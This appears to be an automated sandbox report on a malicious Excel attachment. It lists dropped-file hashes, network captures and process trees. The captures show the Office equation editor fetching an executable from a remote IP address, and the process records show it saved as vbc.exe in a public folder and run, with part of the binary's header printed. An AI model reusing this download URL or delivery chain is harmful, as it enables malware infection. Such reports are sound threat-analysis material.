    MD5:9D7BF0F2FBB81660C8B91C2A323FDE4E
    SHA1:7ADF1D60FD08B3ACCD3A8E58FBDCC674BD1B02EE
    SHA-256:D60188BC3E17E3FE9A8353A5EB4B791316968F3C1CEA1E4E88138718EFEC0611
    SHA-512:39842639F118D709102B7E8440CF569D542CA950F77DCA21615B74639AC3E1F50BF9901E4DEF0DF93D4ADDFE3F8DBC2A4E46E84CF56C85EC33C6F8D43E19F462
    Malicious:false
    Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):512
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:BF619EAC0CDF3F68D496EA9344137E8B
    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
    Malicious:false
    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):512
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:BF619EAC0CDF3F68D496EA9344137E8B
    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
    Malicious:false
    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):512
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:BF619EAC0CDF3F68D496EA9344137E8B
    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
    Malicious:false
    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):165
    Entropy (8bit):1.4377382811115937
    Encrypted:false
    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
    MD5:797869BB881CFBCDAC2064F92B26E46F
    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
    Malicious:true
    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):1096080
    Entropy (8bit):7.1881406519771005
    Encrypted:false
    SSDEEP:24576:HnYO/xJrstd2u3Slcfo259gy6Ym4ZrpdSdwwDtrm83zh:dbst4u3vA2PgTqpdSdvDtrm+zh
    MD5:9052D06C6AC53471F8496263F8FEF2EB
    SHA1:73016558C8353509B15CD757063816369E9ABFA7
    SHA-256:736330AAA3A4683D3CC866153510763351A60062A236D22B12F4FE0F10853582
    SHA-512:84837F8C708A8E51FCC611C3035C5676FF527D5B132398D935C77AC737035BEF9C27DD6010188D6C96B7D1B02FF8DC41A3F50C487F42348BD0F3D016164FA7FC
    Malicious:true
    Antivirus:
    • Antivirus: Virustotal, Detection: 1%, Browse
    • Antivirus: Metadefender, Detection: 9%, Browse
    • Antivirus: ReversingLabs, Detection: 0%
    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....>.]..........................................@.......................................@.................................P5..........0............|...=.......q......................................\...........,;..(............................text...^........................... ..`.rdata...l.......n..................@..@.data...0N...`.......J..............@....00cfg...............T..............@..@.gfids...............V..............@..@.rsrc...0............X..............@..@.reloc...q.......r..................@..B................................................................................................................................................................................................................................................................................................................................................................
    File type:CDFV2 Encrypted
    Entropy (8bit):7.958202975592025
    TrID:
    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
    File name:_FM_BUSAN_HOCHIMINH_.xlsx
    File size:191784
    MD5:9d7bf0f2fbb81660c8b91c2a323fde4e
    SHA1:7adf1d60fd08b3accd3a8e58fbdcc674bd1b02ee
    SHA256:d60188bc3e17e3fe9a8353a5eb4b791316968f3c1cea1e4e88138718efec0611
    SHA512:39842639f118d709102b7e8440cf569d542ca950f77dca21615b74639ac3e1f50bf9901e4def0df93d4addfe3f8dbc2a4e46e84cf56c85ec33c6f8d43e19f462
    SSDEEP:3072:dnK3hkFr084G2tQX/WdCcsE7i9y6T9BSRIjDALPOWEW7eDy/wLyjjBvRhNasgKVT:c3K108GtC/uCcsjk6TWODA7heDvwa5y
    File Content Preview:........................>......................................................................................................................................................................................................................................
    Icon Hash:e4e2aa8aa4b4bcb4
    TimestampSource PortDest PortSource IPDest IP
    Feb 16, 2022 09:11:23.401422977 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.515516043 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.515594006 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.515997887 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.633006096 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.633044958 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.633147955 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.633245945 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.633271933 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.633290052 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.633296013 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.633306980 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.633320093 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.633344889 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.633367062 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.633368969 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.633373976 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.633389950 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.633392096 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.633413076 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.633416891 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.633428097 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.633446932 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.644115925 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748430967 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748472929 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748498917 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748523951 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748547077 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748555899 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748570919 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748589993 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748594999 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748596907 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748605967 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748622894 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748634100 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748647928 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748660088 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748673916 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748682022 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748697996 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748707056 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748724937 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748733044 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748749018 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748759031 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748774052 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748784065 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748800039 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748811007 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748823881 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748836040 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748850107 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748853922 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748874903 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748886108 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748905897 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748909950 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748933077 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.748941898 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.748965979 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.750432014 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863320112 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863363028 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863390923 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863415003 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863440037 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863462925 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863477945 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863486052 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863509893 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863512039 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863514900 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863526106 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863538027 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863563061 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863567114 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863589048 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863595963 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863600969 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863614082 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863626003 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863639116 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863650084 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863665104 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863672972 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863688946 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863708019 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863713026 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863729000 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863738060 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863759995 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863763094 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863775015 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863789082 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863791943 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863811970 CET8049167198.46.132.195192.168.2.22
    Feb 16, 2022 09:11:23.863822937 CET4916780192.168.2.22198.46.132.195
    Feb 16, 2022 09:11:23.863836050 CET8049167198.46.132.195192.168.2.22
    • 198.46.132.195
    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.2249167198.46.132.19580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    TimestampkBytes transferredDirectionData
    Feb 16, 2022 09:11:23.515997887 CET0OUTGET /ProgramFile/.win32.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 198.46.132.195
    Connection: Keep-Alive
    Feb 16, 2022 09:11:23.633006096 CET1INHTTP/1.1 200 OK
    Date: Wed, 16 Feb 2022 08:11:23 GMT
    Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
    Last-Modified: Thu, 27 Jan 2022 15:00:29 GMT
    ETag: "10b990-5d69194428b49"
    Accept-Ranges: bytes
    Content-Length: 1096080
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
    Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 be 3e 87 5d 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d8 08 00 00 a0 07 00 00 00 00 00 96 fe 06 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 11 00 00 04 00 00 8e 81 11 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 35 0b 00 b4 00 00 00 00 d0 0b 00 30 b0 04 00 00 00 00 00 00 00 00 00 00 7c 10 00 90 3d 00 00 00 90 10 00 1c 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 a9 09 00 5c 00 00 00 00 00 00 00 00 00 00 00 2c 3b 0b 00 28 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5e d6 08 00 00 10 00 00 00 d8 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ac 6c 02 00 00 f0 08 00 00 6e 02 00 00 dc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 30 4e 00 00 00 60 0b 00 00 0a 00 00 00 4a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 b0 0b 00 00 02 00 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 66 69 64 73 00 00 b4 00 00 00 00 c0 0b 00 00 02 00 00 00 56 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 30 b0 04 00 00 d0 0b 00 00 b2 04 00 00 58 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 90 10 00 00 72 00 00 00 0a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL>]@@P50|=q\,;(.text^ `.rdataln@@.data0N`J@.00cfgT@@.gfidsV@@.rsrc0X@@.relocqr@B


    Click to jump to process

    Target ID:0
    Start time:09:10:24
    Start date:16/02/2022
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Imagebase:0x13f750000
    File size:28253536 bytes
    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:2
    Start time:09:10:47
    Start date:16/02/2022
    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Wow64 process (32bit):true
    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Imagebase:0x400000
    File size:543304 bytes
    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:4
    Start time:09:10:50
    Start date:16/02/2022
    Path:C:\Users\Public\vbc.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\Public\vbc.exe"
    Imagebase:0x1390000
    File size:1096080 bytes
    MD5 hash:9052D06C6AC53471F8496263F8FEF2EB
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Antivirus matches:
    • Detection: 1%, Virustotal, Browse
    • Detection: 9%, Metadefender, Browse
    • Detection: 0%, ReversingLabs
    Reputation:moderate

    No disassembly